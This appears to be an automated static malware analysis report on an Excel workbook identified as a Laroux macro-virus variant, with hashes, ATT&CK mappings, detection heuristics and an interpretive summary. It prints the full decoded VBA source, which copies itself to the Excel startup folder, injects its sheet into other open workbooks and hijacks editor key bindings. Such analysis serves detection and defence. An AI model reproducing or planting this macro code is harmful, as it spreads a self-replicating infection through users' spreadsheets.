Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10fd06c2414d995f…

MALICIOUS

Office (OLE)

171.0 KB Created: 2012-01-30 09:08:34 Authoring application: Microsoft Excel First seen: 2015-09-23
MD5: 6fce03c7796dfd4e9b48bee1d157d250 SHA-1: c6cbde0de3f852b3ae22fe311bab8fae9ab4913d SHA-256: 10fd06c2414d995fa60bb03b55d10c25df63c95d12cd747193037261341400e9
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel file containing VBA macros, specifically identified as a Laroux macro-virus variant. The `auto_open` subroutine attempts to copy the workbook to the Excel startup path as 'StartUp.xls', indicating an attempt to establish persistence. It also registers handlers for sheet activation and specific key combinations, likely to maintain control or execute further stages. The document body content appears to be financial data, which is likely a lure.

Heuristics 4

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1912 bytes
SHA-256: 674c09e9523aedd02ed57895897ccd70738b4ae03b0247e2adbc31dd52004656
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.name = "StartUp.xls" Then
book.Close
End If
Next
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True